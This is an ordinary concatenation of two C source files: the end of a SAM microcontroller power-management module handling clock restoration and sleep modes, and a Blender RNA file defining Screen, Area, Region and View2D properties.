EEFC_FMR_FWS(1); PMC->CKGR_MOR = (PMC->CKGR_MOR & ~CKGR_MOR_MOSCSEL) | CKGR_MOR_MOSCRCF_24_MHz | CKGR_MOR_KEY_PASSWD; #else PMC->CKGR_MOR = (PMC->CKGR_MOR & ~CKGR_MOR_MOSCSEL) | CKGR_MOR_KEY_PASSWD; #endif while (!(PMC->PMC_SR & PMC_SR_MOSCSELS)); #if (!SAMG) /* FWS update */ EFC0->EEFC_FMR = fmr & (~EEFC_FMR_FWS_Msk); #if defined(EFC1) EFC1->EEFC_FMR = fmr1 & (~EEFC_FMR_FWS_Msk); #endif #endif /* Disable XTALs */ if (disable_xtal) { PMC->CKGR_MOR = (PMC->CKGR_MOR & ~CKGR_MOR_MOSCXTEN) | CKGR_MOR_KEY_PASSWD; } } /** * Restore clock settings */ __always_inline static void pmc_restore_clock_setting( const uint32_t osc_setting, const uint32_t pll0_setting, const uint32_t pll1_setting, const uint32_t mck_setting, const uint32_t fmr_setting #if defined(EFC1) , const uint32_t fmr_setting1 #endif ) { uint32_t mckr; uint32_t pll_sr = 0; /* Switch mainck to external xtal */ if (CKGR_MOR_MOSCXTBY == (osc_setting & CKGR_MOR_MOSCXTBY)) { /* Bypass mode */ PMC->CKGR_MOR = (PMC->CKGR_MOR & ~CKGR_MOR_MOSCXTEN) | CKGR_MOR_KEY_PASSWD | CKGR_MOR_MOSCXTBY | CKGR_MOR_MOSCSEL; PMC->CKGR_MOR = (PMC->CKGR_MOR & ~CKGR_MOR_MOSCRCEN & ~CKGR_MOR_MOSCRCF_Msk) | CKGR_MOR_KEY_PASSWD; } else if (CKGR_MOR_MOSCXTEN == (osc_setting & CKGR_MOR_MOSCXTEN)) { /* Enable External XTAL */ if (!(PMC->CKGR_MOR & CKGR_MOR_MOSCXTEN)) { PMC->CKGR_MOR = (PMC->CKGR_MOR & ~CKGR_MOR_MOSCXTBY) | CKGR_MOR_KEY_PASSWD | CKGR_MOR_MOSCXTEN; /* Wait the Xtal to stabilize */ while (!(PMC->PMC_SR & PMC_SR_MOSCXTS)); } /* Select External XTAL */ if (!(PMC->CKGR_MOR & CKGR_MOR_MOSCSEL)) { PMC->CKGR_MOR |= CKGR_MOR_KEY_PASSWD | CKGR_MOR_MOSCSEL; while (!(PMC->PMC_SR & PMC_SR_MOSCSELS)); } /* Disable Fast RC */ PMC->CKGR_MOR = (PMC->CKGR_MOR & ~CKGR_MOR_MOSCRCEN & ~CKGR_MOR_MOSCRCF_Msk) | CKGR_MOR_KEY_PASSWD; } if (pll0_setting & CKGR_PLLAR_MULA_Msk) { #if (SAM4C || SAM4CM || SAMG || SAM4CP) PMC->CKGR_PLLAR = pll0_setting; #else PMC->CKGR_PLLAR = CKGR_PLLAR_ONE | pll0_setting; #endif pll_sr |= PMC_SR_LOCKA; } #if (SAM3S || SAM4S || SAM4C || SAM4CM || SAM4CP) if (pll1_setting & CKGR_PLLBR_MULB_Msk) { PMC->CKGR_PLLBR = pll1_setting; pll_sr |= PMC_SR_LOCKB; } #elif (SAM3U || SAM3XA) if (pll1_setting & CKGR_UCKR_UPLLEN) { PMC->CKGR_UCKR = pll1_setting; pll_sr |= PMC_SR_LOCKU; } #else UNUSED(pll1_setting); #endif /* Wait MCK source ready */ switch(mck_setting & PMC_MCKR_CSS_Msk) { case PMC_MCKR_CSS_PLLA_CLK: while (!(PMC->PMC_SR & PMC_SR_LOCKA)); break; #if (SAM3S || SAM4S || SAM4C || SAM4CM || SAM4CP) case PMC_MCKR_CSS_PLLB_CLK: while (!(PMC->PMC_SR & PMC_SR_LOCKB)); break; #elif (SAM3U || SAM3XA) case PMC_MCKR_CSS_UPLL_CLK: while (!(PMC->PMC_SR & PMC_SR_LOCKU)); break; #endif } /* Switch to faster clock */ mckr = PMC->PMC_MCKR; /* Set PRES */ PMC->PMC_MCKR = (mckr & ~PMC_MCKR_PRES_Msk) | (mck_setting & PMC_MCKR_PRES_Msk); while (!(PMC->PMC_SR & PMC_SR_MCKRDY)); /* Restore flash wait states */ EFC0->EEFC_FMR = fmr_setting; #if defined(EFC1) EFC1->EEFC_FMR = fmr_setting1; #endif /* Set CSS and others */ PMC->PMC_MCKR = mck_setting; while (!(PMC->PMC_SR & PMC_SR_MCKRDY)); /* Waiting all restored PLLs ready */ while (!(PMC->PMC_SR & pll_sr)); } /** If clocks are switched for some sleep mode */ static volatile bool b_is_sleep_clock_used = false; /** Callback invoked once when clocks are restored */ static pmc_callback_wakeup_clocks_restored_t callback_clocks_restored = NULL; void pmc_sleep(int sleep_mode) { switch (sleep_mode) { case SAM_PM_SMODE_SLEEP_WFI: case SAM_PM_SMODE_SLEEP_WFE: #if (SAM4S || SAM4E || SAM4N || SAM4C || SAM4CM || SAM4CP || SAMG || SAMV71 || SAMV70 || SAMS70 || SAME70) SCB->SCR &= (uint32_t)~SCR_SLEEPDEEP; cpu_irq_enable(); __DSB(); __WFI(); break; #else PMC->PMC_FSMR &= (uint32_t)~PMC_FSMR_LPM; SCB->SCR &= (uint32_t)~SCR_SLEEPDEEP; cpu_irq_enable(); if (sleep_mode == SAM_PM_SMODE_SLEEP_WFI) { __DSB(); __WFI(); } else { __DSB(); __WFE(); } break; #endif case SAM_PM_SMODE_WAIT_FAST: case SAM_PM_SMODE_WAIT: { uint32_t mor, pllr0, pllr1, mckr; uint32_t fmr; #if defined(EFC1) uint32_t fmr1; #endif #if (SAM4S || SAM4E || SAM4N || SAM4C || SAM4CM || SAM4CP || SAMG || SAMV71 || SAMV70 || SAMS70 || SAME70) (sleep_mode == SAM_PM_SMODE_WAIT_FAST) ? pmc_set_flash_in_wait_mode(PMC_FSMR_FLPM_FLASH_STANDBY) : pmc_set_flash_in_wait_mode(PMC_FSMR_FLPM_FLASH_DEEP_POWERDOWN); #endif cpu_irq_disable(); b_is_sleep_clock_used = true; #if (SAM4C || SAM4CM || SAM4CP) /* Backup the sub-system 1 status and stop sub-system 1 */ uint32_t cpclk_backup = PMC->PMC_SCSR & (PMC_SCSR_CPCK | PMC_SCSR_CPBMCK); PMC->PMC_SCDR = cpclk_backup | PMC_SCDR_CPKEY_PASSWD; #endif pmc_save_clock_settings(&mor, &pllr0, &pllr1, &mckr, &fmr, #if defined(EFC1) &fmr1, #endif (sleep_mode == SAM_PM_SMODE_WAIT)); /* Enter wait mode */ cpu_irq_enable(); pmc_enable_waitmode(); cpu_irq_disable(); pmc_restore_clock_setting(mor, pllr0, pllr1, mckr, fmr #if defined(EFC1) , fmr1 #endif ); #if (SAM4C || SAM4CM || SAM4CP) /* Restore the sub-system 1 */ PMC->PMC_SCER = cpclk_backup | PMC_SCER_CPKEY_PASSWD; #endif b_is_sleep_clock_used = false; if (callback_clocks_restored) { callback_clocks_restored(); callback_clocks_restored = NULL; } cpu_irq_enable(); break; } #if (!(SAMG51 || SAMG53 || SAMG54)) case SAM_PM_SMODE_BACKUP: SCB->SCR |= SCR_SLEEPDEEP; #if (SAM4S || SAM4E || SAM4N || SAM4C || SAM4CM || SAM4CP || SAMG55 || SAMV71 || SAMV70 || SAMS70 || SAME70) SUPC->SUPC_CR = SUPC_CR_KEY_PASSWD | SUPC_CR_VROFF_STOP_VREG; cpu_irq_enable(); __WFI() ; #else cpu_irq_enable(); __WFE() ; #endif break; #endif } } bool pmc_is_wakeup_clocks_restored(void) { return !b_is_sleep_clock_used; } void pmc_wait_wakeup_clocks_restore( pmc_callback_wakeup_clocks_restored_t callback) { if (b_is_sleep_clock_used) { cpu_irq_disable(); callback_clocks_restored = callback; } else if (callback) { callback(); } } #endif
142768.c
/* * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software Foundation, * Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /** \file * \ingroup RNA */ #include <stdlib.h> #include <stddef.h> #include "RNA_define.h" #include "RNA_enum_types.h" #include "rna_internal.h" #include "DNA_screen_types.h" #include "DNA_scene_types.h" #include "DNA_workspace_types.h" const EnumPropertyItem rna_enum_region_type_items[] = { {RGN_TYPE_WINDOW, "WINDOW", 0, "Window", ""}, {RGN_TYPE_HEADER, "HEADER", 0, "Header", ""}, {RGN_TYPE_CHANNELS, "CHANNELS", 0, "Channels", ""}, {RGN_TYPE_TEMPORARY, "TEMPORARY", 0, "Temporary", ""}, {RGN_TYPE_UI, "UI", 0, "UI", ""}, {RGN_TYPE_TOOLS, "TOOLS", 0, "Tools", ""}, {RGN_TYPE_TOOL_PROPS, "TOOL_PROPS", 0, "Tool Properties", ""}, {RGN_TYPE_PREVIEW, "PREVIEW", 0, "Preview", ""}, {RGN_TYPE_HUD, "HUD", 0, "Floating Region", ""}, {RGN_TYPE_NAV_BAR, "NAVIGATION_BAR", 0, "Navigation Bar", ""}, {RGN_TYPE_EXECUTE, "EXECUTE", 0, "Execute Buttons", ""}, {RGN_TYPE_FOOTER, "FOOTER", 0, "Footer", ""}, {RGN_TYPE_TOOL_HEADER, "TOOL_HEADER", 0, "Tool Header", ""}, {0, NULL, 0, NULL, NULL}, }; #include "ED_screen.h" #include "WM_api.h" #include "WM_types.h" #ifdef RNA_RUNTIME # include "BKE_global.h" # include "BKE_workspace.h" # include "BKE_screen.h" # include "DEG_depsgraph.h" # include "UI_view2d.h" # ifdef WITH_PYTHON # include "BPY_extern.h" # endif static void rna_Screen_bar_update(Main *UNUSED(bmain), Scene *UNUSED(scene), PointerRNA *ptr) { bScreen *screen = (bScreen *)ptr->data; screen->do_draw = true; screen->do_refresh = true; } static void rna_Screen_redraw_update(Main *UNUSED(bmain), Scene *UNUSED(scene), PointerRNA *ptr) { bScreen *screen = (bScreen *)ptr->data; /* the settings for this are currently only available from a menu in the TimeLine, * hence refresh=SPACE_ACTION, as timeline is now in there */ ED_screen_animation_timer_update(screen, screen->redraws_flag, SPACE_ACTION); } static bool rna_Screen_is_animation_playing_get(PointerRNA *UNUSED(ptr)) { /* can be NULL on file load, T42619 */ wmWindowManager *wm = G_MAIN->wm.first; return wm ? (ED_screen_animation_playing(wm) != NULL) : 0; } static int rna_region_alignment_get(PointerRNA *ptr) { ARegion *region = ptr->data; return RGN_ALIGN_ENUM_FROM_MASK(region->alignment); } static bool rna_Screen_fullscreen_get(PointerRNA *ptr) { bScreen *sc = (bScreen *)ptr->data; return (sc->state == SCREENMAXIMIZED); } /* UI compatible list: should not be needed, but for now we need to keep EMPTY * at least in the static version of this enum for python scripts. */ static const EnumPropertyItem *rna_Area_type_itemf(bContext *UNUSED(C), PointerRNA *UNUSED(ptr), PropertyRNA *UNUSED(prop), bool *r_free) { EnumPropertyItem *item = NULL; int totitem = 0; /* +1 to skip SPACE_EMPTY */ for (const EnumPropertyItem *item_from = rna_enum_space_type_items + 1; item_from->identifier; item_from++) { if (ELEM(item_from->value, SPACE_TOPBAR, SPACE_STATUSBAR)) { continue; } RNA_enum_item_add(&item, &totitem, item_from); } RNA_enum_item_end(&item, &totitem); *r_free = true; return item; } static int rna_Area_type_get(PointerRNA *ptr) { ScrArea *sa = (ScrArea *)ptr->data; /* Usually 'spacetype' is used. It lags behind a bit while switching area * type though, then we use 'butspacetype' instead (T41435). */ return (sa->butspacetype == SPACE_EMPTY) ? sa->spacetype : sa->butspacetype; } static void rna_Area_type_set(PointerRNA *ptr, int value) { if (ELEM(value, SPACE_TOPBAR, SPACE_STATUSBAR)) { /* Special case: An area can not be set to show the top-bar editor (or * other global areas). However it should still be possible to identify * its type from Python. */ return; } ScrArea *sa = (ScrArea *)ptr->data; sa->butspacetype = value; } static void rna_Area_type_update(bContext *C, PointerRNA *ptr) { bScreen *sc = (bScreen *)ptr->id.data; ScrArea *sa = (ScrArea *)ptr->data; /* Running update without having called 'set', see: T64049 */ if (sa->butspacetype == SPACE_EMPTY) { return; } wmWindowManager *wm = CTX_wm_manager(C); wmWindow *win; /* XXX this call still use context, so we trick it to work in the right context */ for (win = wm->windows.first; win; win = win->next) { if (sc == WM_window_get_active_screen(win)) { wmWindow *prevwin = CTX_wm_window(C); ScrArea *prevsa = CTX_wm_area(C); ARegion *prevar = CTX_wm_region(C); CTX_wm_window_set(C, win); CTX_wm_area_set(C, sa); CTX_wm_region_set(C, NULL); ED_area_newspace(C, sa, sa->butspacetype, true); ED_area_tag_redraw(sa); /* Unset so that rna_Area_type_get uses spacetype instead. */ sa->butspacetype = SPACE_EMPTY; /* It is possible that new layers becomes visible. */ if (sa->spacetype == SPACE_VIEW3D) { DEG_on_visible_update(CTX_data_main(C), false); } CTX_wm_window_set(C, prevwin); CTX_wm_area_set(C, prevsa); CTX_wm_region_set(C, prevar); break; } } } static const EnumPropertyItem *rna_Area_ui_type_itemf(bContext *C, PointerRNA *UNUSED(ptr), PropertyRNA *UNUSED(prop), bool *r_free) { EnumPropertyItem *item = NULL; int totitem = 0; /* +1 to skip SPACE_EMPTY */ for (const EnumPropertyItem *item_from = rna_enum_space_type_items + 1; item_from->identifier; item_from++) { if (ELEM(item_from->value, SPACE_TOPBAR, SPACE_STATUSBAR)) { continue; } SpaceType *st = item_from->identifier[0] ? BKE_spacetype_from_id(item_from->value) : NULL; int totitem_prev = totitem; if (st && st->space_subtype_item_extend != NULL) { st->space_subtype_item_extend(C, &item, &totitem); while (totitem_prev < totitem) { item[totitem_prev++].value |= item_from->value << 16; } } else { RNA_enum_item_add(&item, &totitem, item_from); item[totitem_prev++].value = item_from->value << 16; } } RNA_enum_item_end(&item, &totitem); *r_free = true; return item; } static int rna_Area_ui_type_get(PointerRNA *ptr) { ScrArea *sa = ptr->data; const int area_type = rna_Area_type_get(ptr); const bool area_changing = sa->butspacetype != SPACE_EMPTY; int value = area_type << 16; /* sa->type can be NULL (when not yet initialized), try to do it now. */ /* Copied from `ED_area_initialize()`.*/ if (sa->type == NULL || area_changing) { sa->type = BKE_spacetype_from_id(area_type); if (sa->type == NULL) { sa->spacetype = SPACE_VIEW3D; sa->type = BKE_spacetype_from_id(sa->spacetype); } BLI_assert(sa->type != NULL); } if (sa->type->space_subtype_item_extend != NULL) { value |= area_changing ? sa->butspacetype_subtype : sa->type->space_subtype_get(sa); } return value; } static void rna_Area_ui_type_set(PointerRNA *ptr, int value) { ScrArea *sa = ptr->data; const int space_type = value >> 16; SpaceType *st = BKE_spacetype_from_id(space_type); rna_Area_type_set(ptr, space_type); if (st && st->space_subtype_item_extend != NULL) { sa->butspacetype_subtype = value & 0xffff; } } static void rna_Area_ui_type_update(bContext *C, PointerRNA *ptr) { ScrArea *sa = ptr->data; SpaceType *st = BKE_spacetype_from_id(sa->butspacetype); rna_Area_type_update(C, ptr); if ((sa->type == st) && (st->space_subtype_item_extend != NULL)) { st->space_subtype_set(sa, sa->butspacetype_subtype); } sa->butspacetype_subtype = 0; } static void rna_View2D_region_to_view(struct View2D *v2d, int x, int y, float result[2]) { UI_view2d_region_to_view(v2d, x, y, &result[0], &result[1]); } static void rna_View2D_view_to_region( struct View2D *v2d, float x, float y, bool clip, int result[2]) { if (clip) { UI_view2d_view_to_region_clip(v2d, x, y, &result[0], &result[1]); } else { UI_view2d_view_to_region(v2d, x, y, &result[0], &result[1]); } } #else /* Area.spaces */ static void rna_def_area_spaces(BlenderRNA *brna, PropertyRNA *cprop) { StructRNA *srna; PropertyRNA *prop; RNA_def_property_srna(cprop, "AreaSpaces"); srna = RNA_def_struct(brna, "AreaSpaces", NULL); RNA_def_struct_sdna(srna, "ScrArea"); RNA_def_struct_ui_text(srna, "Area Spaces", "Collection of spaces"); prop = RNA_def_property(srna, "active", PROP_POINTER, PROP_NONE); RNA_def_property_pointer_sdna(prop, NULL, "spacedata.first"); RNA_def_property_struct_type(prop, "Space"); RNA_def_property_ui_text(prop, "Active Space", "Space currently being displayed in this area"); } static void rna_def_area_api(StructRNA *srna) { FunctionRNA *func; PropertyRNA *parm; RNA_def_function(srna, "tag_redraw", "ED_area_tag_redraw"); func = RNA_def_function(srna, "header_text_set", "ED_area_status_text"); RNA_def_function_ui_description(func, "Set the header status text"); parm = RNA_def_string( func, "text", NULL, 0, "Text", "New string for the header, None clears the text"); RNA_def_parameter_flags(parm, 0, PARM_REQUIRED); RNA_def_property_clear_flag(parm, PROP_NEVER_NULL); } static void rna_def_area(BlenderRNA *brna) { StructRNA *srna; PropertyRNA *prop; srna = RNA_def_struct(brna, "Area", NULL); RNA_def_struct_ui_text(srna, "Area", "Area in a subdivided screen, containing an editor"); RNA_def_struct_sdna(srna, "ScrArea"); prop = RNA_def_property(srna, "spaces", PROP_COLLECTION, PROP_NONE); RNA_def_property_collection_sdna(prop, NULL, "spacedata", NULL); RNA_def_property_struct_type(prop, "Space"); RNA_def_property_ui_text(prop, "Spaces", "Spaces contained in this area, the first being the active space " "(NOTE: Useful for example to restore a previously used 3D view space " "in a certain area to get the old view orientation)"); rna_def_area_spaces(brna, prop); prop = RNA_def_property(srna, "regions", PROP_COLLECTION, PROP_NONE); RNA_def_property_collection_sdna(prop, NULL, "regionbase", NULL); RNA_def_property_struct_type(prop, "Region"); RNA_def_property_ui_text(prop, "Regions", "Regions this area is subdivided in"); prop = RNA_def_property(srna, "show_menus", PROP_BOOLEAN, PROP_NONE); RNA_def_property_boolean_negative_sdna(prop, NULL, "flag", HEADER_NO_PULLDOWN); RNA_def_property_ui_text(prop, "Show Menus", "Show menus in the header"); prop = RNA_def_property(srna, "type", PROP_ENUM, PROP_NONE); RNA_def_property_enum_sdna(prop, NULL, "spacetype"); RNA_def_property_enum_items(prop, rna_enum_space_type_items); RNA_def_property_enum_default(prop, SPACE_VIEW3D); RNA_def_property_enum_funcs( prop, "rna_Area_type_get", "rna_Area_type_set", "rna_Area_type_itemf"); RNA_def_property_ui_text(prop, "Editor Type", "Current editor type for this area"); RNA_def_property_flag(prop, PROP_CONTEXT_UPDATE); RNA_def_property_clear_flag(prop, PROP_ANIMATABLE); RNA_def_property_update(prop, 0, "rna_Area_type_update"); prop = RNA_def_property(srna, "ui_type", PROP_ENUM, PROP_NONE); RNA_def_property_enum_items(prop, DummyRNA_NULL_items); /* infact dummy */ RNA_def_property_enum_default(prop, SPACE_VIEW3D << 16); RNA_def_property_enum_funcs( prop, "rna_Area_ui_type_get", "rna_Area_ui_type_set", "rna_Area_ui_type_itemf"); RNA_def_property_ui_text(prop, "Editor Type", "Current editor type for this area"); RNA_def_property_flag(prop, PROP_CONTEXT_UPDATE); RNA_def_property_clear_flag(prop, PROP_ANIMATABLE); RNA_def_property_update(prop, 0, "rna_Area_ui_type_update"); prop = RNA_def_property(srna, "x", PROP_INT, PROP_NONE); RNA_def_property_int_sdna(prop, NULL, "totrct.xmin"); RNA_def_property_clear_flag(prop, PROP_EDITABLE); RNA_def_property_ui_text( prop, "X Position", "The window relative vertical location of the area"); prop = RNA_def_property(srna, "y", PROP_INT, PROP_NONE); RNA_def_property_int_sdna(prop, NULL, "totrct.ymin"); RNA_def_property_clear_flag(prop, PROP_EDITABLE); RNA_def_property_ui_text( prop, "Y Position", "The window relative horizontal location of the area"); prop = RNA_def_property(srna, "width", PROP_INT, PROP_UNSIGNED); RNA_def_property_int_sdna(prop, NULL, "winx"); RNA_def_property_clear_flag(prop, PROP_EDITABLE); RNA_def_property_ui_text(prop, "Width", "Area width"); prop = RNA_def_property(srna, "height", PROP_INT, PROP_UNSIGNED); RNA_def_property_int_sdna(prop, NULL, "winy"); RNA_def_property_clear_flag(prop, PROP_EDITABLE); RNA_def_property_ui_text(prop, "Height", "Area height"); rna_def_area_api(srna); } static void rna_def_view2d_api(StructRNA *srna) { FunctionRNA *func; PropertyRNA *parm; static const float view_default[2] = {0.0f, 0.0f}; static const int region_default[2] = {0.0f, 0.0f}; func = RNA_def_function(srna, "region_to_view", "rna_View2D_region_to_view"); RNA_def_function_ui_description(func, "Transform region coordinates to 2D view"); parm = RNA_def_int(func, "x", 0, INT_MIN, INT_MAX, "x", "Region x coordinate", -10000, 10000); RNA_def_parameter_flags(parm, 0, PARM_REQUIRED); parm = RNA_def_int(func, "y", 0, INT_MIN, INT_MAX, "y", "Region y coordinate", -10000, 10000); RNA_def_parameter_flags(parm, 0, PARM_REQUIRED); parm = RNA_def_float_array(func, "result", 2, view_default, -FLT_MAX, FLT_MAX, "Result", "View coordinates", -10000.0f, 10000.0f); RNA_def_parameter_flags(parm, PROP_THICK_WRAP, 0); RNA_def_function_output(func, parm); func = RNA_def_function(srna, "view_to_region", "rna_View2D_view_to_region"); RNA_def_function_ui_description(func, "Transform 2D view coordinates to region"); parm = RNA_def_float( func, "x", 0.0f, -FLT_MAX, FLT_MAX, "x", "2D View x coordinate", -10000.0f, 10000.0f); RNA_def_parameter_flags(parm, 0, PARM_REQUIRED); parm = RNA_def_float( func, "y", 0.0f, -FLT_MAX, FLT_MAX, "y", "2D View y coordinate", -10000.0f, 10000.0f); RNA_def_parameter_flags(parm, 0, PARM_REQUIRED); RNA_def_boolean(func, "clip", 1, "Clip", "Clip coordinates to the visible region"); parm = RNA_def_int_array(func, "result", 2, region_default, INT_MIN, INT_MAX, "Result", "Region coordinates", -10000, 10000); RNA_def_parameter_flags(parm, PROP_THICK_WRAP, 0); RNA_def_function_output(func, parm); } static void rna_def_view2d(BlenderRNA *brna) { StructRNA *srna; /* PropertyRNA *prop; */ srna = RNA_def_struct(brna, "View2D", NULL); RNA_def_struct_ui_text(srna, "View2D", "Scroll and zoom for a 2D region"); RNA_def_struct_sdna(srna, "View2D"); /* TODO more View2D properties could be exposed here (read-only) */ rna_def_view2d_api(srna); } static void rna_def_region(BlenderRNA *brna) { StructRNA *srna; PropertyRNA *prop; static const EnumPropertyItem alignment_types[] = { {RGN_ALIGN_NONE, "NONE", 0, "None", "Don't use any fixed alignment, fill available space"}, {RGN_ALIGN_TOP, "TOP", 0, "Top", ""}, {RGN_ALIGN_BOTTOM, "BOTTOM", 0, "Bottom", ""}, {RGN_ALIGN_LEFT, "LEFT", 0, "Left", ""}, {RGN_ALIGN_RIGHT, "RIGHT", 0, "Right", ""}, {RGN_ALIGN_HSPLIT, "HORIZONTAL_SPLIT", 0, "Horizontal Split", ""}, {RGN_ALIGN_VSPLIT, "VERTICAL_SPLIT", 0, "Vertical Split", ""}, {RGN_ALIGN_FLOAT, "FLOAT", 0, "Float", "Region floats on screen, doesn't use any fixed alignment"}, {RGN_ALIGN_QSPLIT, "QUAD_SPLIT", 0, "Quad Split", "Region is split horizontally and vertically"}, {0, NULL, 0, NULL, NULL}, }; srna = RNA_def_struct(brna, "Region", NULL); RNA_def_struct_ui_text(srna, "Region", "Region in a subdivided screen area"); RNA_def_struct_sdna(srna, "ARegion"); prop = RNA_def_property(srna, "type", PROP_ENUM, PROP_NONE); RNA_def_property_enum_sdna(prop, NULL, "regiontype"); RNA_def_property_enum_items(prop, rna_enum_region_type_items); RNA_def_property_clear_flag(prop, PROP_EDITABLE); RNA_def_property_ui_text(prop, "Region Type", "Type of this region"); prop = RNA_def_property(srna, "x", PROP_INT, PROP_NONE); RNA_def_property_int_sdna(prop, NULL, "winrct.xmin"); RNA_def_property_clear_flag(prop, PROP_EDITABLE); RNA_def_property_ui_text( prop, "X Position", "The window relative vertical location of the region"); prop = RNA_def_property(srna, "y", PROP_INT, PROP_NONE); RNA_def_property_int_sdna(prop, NULL, "winrct.ymin"); RNA_def_property_clear_flag(prop, PROP_EDITABLE); RNA_def_property_ui_text( prop, "Y Position", "The window relative horizontal location of the region"); prop = RNA_def_property(srna, "width", PROP_INT, PROP_UNSIGNED); RNA_def_property_int_sdna(prop, NULL, "winx"); RNA_def_property_clear_flag(prop, PROP_EDITABLE); RNA_def_property_ui_text(prop, "Width", "Region width"); prop = RNA_def_property(srna, "height", PROP_INT, PROP_UNSIGNED); RNA_def_property_int_sdna(prop, NULL, "winy"); RNA_def_property_clear_flag(prop, PROP_EDITABLE); RNA_def_property_ui_text(prop, "Height", "Region height"); prop = RNA_def_property(srna, "view2d", PROP_POINTER, PROP_NONE); RNA_def_property_pointer_sdna(prop, NULL, "v2d"); RNA_def_property_clear_flag(prop, PROP_EDITABLE); RNA_def_property_flag(prop, PROP_NEVER_NULL); RNA_def_property_ui_text(prop, "View2D", "2D view of the region"); prop = RNA_def_property(srna, "alignment", PROP_ENUM, PROP_NONE); RNA_def_property_clear_flag(prop, PROP_EDITABLE); RNA_def_property_enum_items(prop, alignment_types); RNA_def_property_enum_funcs(prop, "rna_region_alignment_get", NULL, NULL); RNA_def_property_ui_text(prop, "Alignment", "Alignment of the region within the area"); RNA_def_function(srna, "tag_redraw", "ED_region_tag_redraw"); } static void rna_def_screen(BlenderRNA *brna) { StructRNA *srna; PropertyRNA *prop; srna = RNA_def_struct(brna, "Screen", "ID"); RNA_def_struct_sdna(srna, "Screen"); /* it is actually bScreen but for 2.5 the dna is patched! */ RNA_def_struct_ui_text( srna, "Screen", "Screen data-block, defining the layout of areas in a window"); RNA_def_struct_ui_icon(srna, ICON_WORKSPACE); /* collections */ prop = RNA_def_property(srna, "areas", PROP_COLLECTION, PROP_NONE); RNA_def_property_collection_sdna(prop, NULL, "areabase", NULL); RNA_def_property_struct_type(prop, "Area"); RNA_def_property_ui_text(prop, "Areas", "Areas the screen is subdivided into"); /* readonly status indicators */ prop = RNA_def_property(srna, "is_animation_playing", PROP_BOOLEAN, PROP_NONE); RNA_def_property_clear_flag(prop, PROP_EDITABLE); RNA_def_property_boolean_funcs(prop, "rna_Screen_is_animation_playing_get", NULL); RNA_def_property_ui_text(prop, "Animation Playing", "Animation playback is active"); prop = RNA_def_property(srna, "is_temporary", PROP_BOOLEAN, PROP_NONE); RNA_def_property_clear_flag(prop, PROP_EDITABLE); RNA_def_property_boolean_sdna(prop, NULL, "temp", 1); RNA_def_property_ui_text(prop, "Temporary", ""); prop = RNA_def_property(srna, "show_fullscreen", PROP_BOOLEAN, PROP_NONE); RNA_def_property_clear_flag(prop, PROP_EDITABLE); RNA_def_property_boolean_funcs(prop, "rna_Screen_fullscreen_get", NULL); RNA_def_property_ui_text(prop, "Maximize", "An area is maximized, filling this screen"); prop = RNA_def_property(srna, "show_statusbar", PROP_BOOLEAN, PROP_NONE); RNA_def_property_boolean_negative_sdna(prop, NULL, "flag", SCREEN_COLLAPSE_STATUSBAR); RNA_def_property_ui_text(prop, "Show Status Bar", "Show status bar"); RNA_def_property_update(prop, 0, "rna_Screen_bar_update"); /* Define Anim Playback Areas */ prop = RNA_def_property(srna, "use_play_top_left_3d_editor", PROP_BOOLEAN, PROP_NONE); RNA_def_property_boolean_sdna(prop, NULL, "redraws_flag", TIME_REGION); RNA_def_property_ui_text(prop, "Top-Left 3D Editor", ""); RNA_def_property_update(prop, NC_SPACE | ND_SPACE_TIME, "rna_Screen_redraw_update"); prop = RNA_def_property(srna, "use_play_3d_editors", PROP_BOOLEAN, PROP_NONE); RNA_def_property_boolean_sdna(prop, NULL, "redraws_flag", TIME_ALL_3D_WIN); RNA_def_property_ui_text(prop, "All 3D Viewports", ""); RNA_def_property_update(prop, NC_SPACE | ND_SPACE_TIME, "rna_Screen_redraw_update"); prop = RNA_def_property(srna, "use_follow", PROP_BOOLEAN, PROP_NONE); RNA_def_property_boolean_sdna(prop, NULL, "redraws_flag", TIME_FOLLOW); RNA_def_property_ui_text(prop, "Follow", "Follow current frame in editors"); RNA_def_property_update(prop, NC_SPACE | ND_SPACE_TIME, "rna_Screen_redraw_update"); prop = RNA_def_property(srna, "use_play_animation_editors", PROP_BOOLEAN, PROP_NONE); RNA_def_property_boolean_sdna(prop, NULL, "redraws_flag", TIME_ALL_ANIM_WIN); RNA_def_property_ui_text(prop, "Animation Editors", ""); RNA_def_property_update(prop, NC_SPACE | ND_SPACE_TIME, "rna_Screen_redraw_update"); prop = RNA_def_property(srna, "use_play_properties_editors", PROP_BOOLEAN, PROP_NONE); RNA_def_property_boolean_sdna(prop, NULL, "redraws_flag", TIME_ALL_BUTS_WIN); RNA_def_property_ui_text(prop, "Property Editors", ""); RNA_def_property_update(prop, NC_SPACE | ND_SPACE_TIME, "rna_Screen_redraw_update"); prop = RNA_def_property(srna, "use_play_image_editors", PROP_BOOLEAN, PROP_NONE); RNA_def_property_boolean_sdna(prop, NULL, "redraws_flag", TIME_ALL_IMAGE_WIN); RNA_def_property_ui_text(prop, "Image Editors", ""); RNA_def_property_update(prop, NC_SPACE | ND_SPACE_TIME, "rna_Screen_redraw_update"); prop = RNA_def_property(srna, "use_play_sequence_editors", PROP_BOOLEAN, PROP_NONE); RNA_def_property_boolean_sdna(prop, NULL, "redraws_flag", TIME_SEQ); RNA_def_property_ui_text(prop, "Sequencer Editors", ""); RNA_def_property_update(prop, NC_SPACE | ND_SPACE_TIME, "rna_Screen_redraw_update"); prop = RNA_def_property(srna, "use_play_node_editors", PROP_BOOLEAN, PROP_NONE); RNA_def_property_boolean_sdna(prop, NULL, "redraws_flag", TIME_NODES); RNA_def_property_ui_text(prop, "Node Editors", ""); RNA_def_property_update(prop, NC_SPACE | ND_SPACE_TIME, "rna_Screen_redraw_update"); prop = RNA_def_property(srna, "use_play_clip_editors", PROP_BOOLEAN, PROP_NONE); RNA_def_property_boolean_sdna(prop, NULL, "redraws_flag", TIME_CLIPS); RNA_def_property_ui_text(prop, "Clip Editors", ""); RNA_def_property_update(prop, NC_SPACE | ND_SPACE_TIME, "rna_Screen_redraw_update"); } void RNA_def_screen(BlenderRNA *brna) { rna_def_screen(brna); rna_def_area(brna); rna_def_region(brna); rna_def_view2d(brna); } #endif
849570.c
